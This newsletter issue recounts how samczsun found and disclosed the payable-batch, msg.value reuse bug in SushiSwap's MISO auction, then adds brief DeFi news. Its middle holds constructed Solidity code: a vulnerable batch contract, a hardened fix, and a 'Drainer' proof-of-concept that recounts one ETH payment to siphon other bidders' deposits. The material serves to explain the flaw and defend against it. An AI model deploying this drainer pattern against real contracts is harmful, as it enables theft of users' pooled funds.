Another Day, Another Hack… Almost!
How a Paradigm researcher prevented another disastrous hack and why it’s kind of ironic
Hey DEFI TIMES community,
Last week, we talked about the Poly Network hack, where an attacker drained over $600 million from the protocol's token bridge. Luckily, the attacker returned almost all of the funds!
This time, things could have gone wrong… almost!
Sam Sun (samczsun) explained how he examined the smart contract code for the BitDAO token sale, which ran on SushiSwap's MISO launchpad. BitDAO completed a token sale worth over $365 million, with over $230 million coming from Peter Thiel, Pantera Capital, Dragonfly Capital, and other partners. It was one of the largest token sales in the history of DAOs.
Sam Sun pointed out a critical bug that could have put the whole $365 million at risk.
Sun didn’t expect to find any bugs at first:
“I didn’t really expect this to be a vulnerability though, since I didn’t expect the Sushi team to make such an obvious misstep.”
After looking closer, he found a bug in the MISO Dutch auction contract. It was not a missing access control: the contract's batch function, which lets a caller bundle several calls into one transaction via delegatecall, was payable, and the payable commitEth function reachable through it trusted msg.value. Because msg.value is preserved across delegatecall, one ETH payment could be counted once per call in the batch, and the auction's refund logic would then pay out ETH that actually belonged to other bidders.
He tested the bug with a successful exploit and immediately contacted his colleagues Georgios Konstantopoulos and Dan Robinson to double-check.
“Suddenly, my little vulnerability just got a lot bigger. I wasn’t dealing with a bug that would let you outbid other participants. I was looking at a 350 million dollar bug.”
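To make the mechanism concrete, here is a constructed illustration of the pattern (not the MISO source and not the exploit Sun ran): a payable batch() that delegatecalls back into the same contract, a payable commit function that trusts msg.value and refunds anything over the hard cap, and the hardened variant where batch() is not payable. Contract names, the 10 ETH cap and the Drainer contract are all assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed example: the shape of the MISO bug, not MISO's code.
abstract contract AuctionCore {
    uint256 public constant HARD_CAP = 10 ether; // assumed cap for the example
    uint256 public totalCommitted;
    mapping(address => uint256) public commitments;

    // Credits msg.value up to the remaining cap and refunds the rest.
    // Safe on its own; unsafe when reached through a payable delegatecall loop,
    // because every loop iteration sees the same msg.value again.
    function commitEth() external payable {
        uint256 available = HARD_CAP - totalCommitted;
        uint256 accepted = msg.value < available ? msg.value : available;
        commitments[msg.sender] += accepted;
        totalCommitted += accepted;
        uint256 refund = msg.value - accepted;
        if (refund > 0) {
            // In a batch past the cap this pays out ETH the caller never sent.
            (bool sent, ) = msg.sender.call{value: refund}("");
            require(sent, "refund failed");
        }
    }

    // delegatecall keeps msg.sender and msg.value of the outer call.
    function _batch(bytes[] calldata calls) internal {
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, bytes memory result) = address(this).delegatecall(calls[i]);
            require(ok, string(result));
        }
    }
}

// Vulnerable: batch is payable, so 1 ETH sent once is "seen" by every call.
contract VulnerableAuction is AuctionCore {
    function batch(bytes[] calldata calls) external payable {
        _batch(calls);
    }
}

// Hardened: batch is not payable, so msg.value inside every delegatecall is 0.
// Sending ETH to it reverts, and commitEth must be called directly with real ETH.
contract HardenedAuction is AuctionCore {
    function batch(bytes[] calldata calls) external {
        _batch(calls);
    }
}

// Assumed attacker contract. Scenario: other bidders already committed 9 ETH,
// so the auction holds 9 ETH and 1 ETH of cap remains.
contract Drainer {
    VulnerableAuction public immutable target;

    constructor(VulnerableAuction _target) {
        target = _target;
    }

    receive() external payable {} // receives the bogus refunds

    // Send 1 ETH once, have it counted n times. Call 1 fills the cap;
    // every later call finds 0 ETH available and "refunds" the full 1 ETH,
    // so n = 10 moves the other bidders' 9 ETH plus our own 1 ETH to us.
    function drain(uint256 n) external payable {
        bytes[] memory calls = new bytes[](n);
        for (uint256 i = 0; i < n; i++) {
            calls[i] = abi.encodeWithSelector(AuctionCore.commitEth.selector);
        }
        target.batch{value: msg.value}(calls);
    }
}
```

The check a reviewer would run on any contract that inherits a multicall or batch helper: list every payable function reachable through it, and for each one ask whether it reads msg.value. If it does, either the batch entry point must be non-payable, or the helper must hand each call an explicit amount and deduct it from a running msg.value budget, so the sum of the amounts never exceeds what was actually sent.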
After that, Sam Sun contacted SushiSwap CTO Joseph Delong to rescue the funds. The SushiSwap and BitDAO teams acted quickly: BitDAO ended the auction manually by buying the remaining allocation, which took the ETH out of the vulnerable contract. Funds were safe!
But things could have gone differently! Why?
There's a potential conflict of interest between SushiSwap and Paradigm. Paradigm is an investor in Uniswap, and SushiSwap is Uniswap's main competitor. In effect, a Paradigm researcher saved one of his own portfolio's biggest rivals.
samczsun (@samczsun) on Twitter: "Auditor's logs, 16th of August. I found a critical vulnerability in SushiSwap's MISO platform" https://t.co/untzdxay7q
I wonder what would have happened if Sam Sun had simply left the bug to be discovered by someone else. I think it would have significantly damaged SushiSwap's reputation. It probably wouldn't have killed SushiSwap completely, but Uniswap would have profited in a big way.
Things like this only happen in crypto!
Subscribe to our newsletter to level up your crypto game!
Gelato $GEL Whitelist Opening
Gelato has announced their whitelist opening for the $GEL token sale.
Eindhoven Bitcoin payment
The popular European football club PSV Eindhoven announced they will accept bitcoin for a new sponsorship deal!
AAVE and Curve on Avalanche
The two large DeFi blue chips, Aave and Curve, will launch on Avalanche within a $180 million incentive program.
Rainbow Supports L2s
Rainbow, which is an Ethereum wallet, will now support Optimism, Arbitrum, and Polygon.
Tally Wallet Announced
Tally Wallet has been announced as a MetaMask competitor. It aims to bring a truly community-owned web3 wallet to the market.
1inch on Optimism
1inch has announced that they launched on Optimism.
SuperRare Launches $RARE
SuperRare has introduced $RARE and aims to decentralize the platform with a DAO.
QuickSwap Limit Orders
QuickSwap has integrated limit orders - in partnership with Gelato.
Aave goes mobile
The Aave community has proposed building a mobile app. The app is intended to grow the number of users and the protocol's TVL.
DISCLAIMER: All information presented above is meant for informational purposes only and should not be treated as financial, legal, or tax advice. This article's content solely reflects the opinion of the writer, who is not a financial advisor.
Do your own research before you purchase cryptocurrencies. Any cryptocurrency can go down in value. Holding cryptocurrencies is risky.